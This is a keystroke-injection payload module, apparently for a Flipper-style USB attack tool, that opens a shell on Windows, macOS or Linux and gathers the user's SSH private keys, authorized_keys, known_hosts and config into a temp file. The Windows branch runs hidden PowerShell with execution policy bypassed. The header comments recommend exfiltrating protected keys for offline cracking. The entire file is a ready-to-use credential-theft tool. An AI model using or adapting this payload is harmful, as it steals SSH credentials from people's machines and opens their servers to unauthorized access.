# FlipperPwn Module: SSH Key Exfiltration
# Reads SSH private keys, authorized_keys, and known_hosts from the default ~/.ssh directory.
# Output is printed to the terminal — capture via screen recording or redirect to file.
# If keys are passphrase-protected, exfiltrate the file itself for offline cracking with ssh2john.

NAME ssh_keys
DESCRIPTION Read SSH private keys, authorized_keys, and known_hosts from the user's .ssh directory
CATEGORY credential
PLATFORMS WIN,MAC,LINUX

# No options required

PLATFORM WIN
  # Open hidden PowerShell via Run dialog — use cmd /c type for raw output
  DELAY 500
  GUI r
  DELAY 300
  STRING powershell -w h -nop -ep bypass
  ENTER
  DELAY 1000
  # Check for all common key types; output to temp file then open
  STRING $o="$env:TEMP\ssh_keys.txt"; $d="$env:USERPROFILE\.ssh"; "=== SSH KEY HARVEST ===" | Out-File $o; "--- Directory listing ---" | Out-File $o -Append; if(Test-Path $d){Get-ChildItem $d | Out-File $o -Append; foreach($k in @("id_rsa","id_ed25519","id_ecdsa","id_dsa","authorized_keys","known_hosts","config")){$f="$d\$k"; if(Test-Path $f){"=== $k ===" | Out-File $o -Append; Get-Content $f | Out-File $o -Append}}}else{"No .ssh directory found" | Out-File $o -Append}; Start-Process notepad $o
  ENTER

PLATFORM MAC
  # Open Terminal via Spotlight
  DELAY 500
  GUI SPACE
  DELAY 400
  STRING Terminal
  ENTER
  DELAY 1200
  # Print each key type if it exists; also check for non-default key names
  STRING o=/tmp/ssh_keys.txt; echo "=== SSH KEY HARVEST ===" > $o; echo "--- Directory listing ---" >> $o; ls -la ~/.ssh/ 2>/dev/null >> $o || echo "No .ssh directory" >> $o; for k in id_rsa id_ed25519 id_ecdsa id_dsa authorized_keys known_hosts config; do [ -f ~/.ssh/$k ] && echo "=== $k ===" >> $o && cat ~/.ssh/$k >> $o; done; open -e $o
  ENTER

PLATFORM LINUX
  # Open terminal emulator
  DELAY 500
  CTRL ALT t
  DELAY 1000
  # Same as macOS; also check for keys in /root/.ssh if running with elevated privileges
  STRING o=/tmp/ssh_keys.txt; echo "=== SSH KEY HARVEST ===" > $o; echo "--- Directory listing ---" >> $o; ls -la ~/.ssh/ 2>/dev/null >> $o || echo "No .ssh directory" >> $o; for k in id_rsa id_ed25519 id_ecdsa id_dsa authorized_keys known_hosts config; do [ -f ~/.ssh/$k ] && echo "=== $k ===" >> $o && cat ~/.ssh/$k >> $o; done; xdg-open $o 2>/dev/null || cat $o
  ENTER
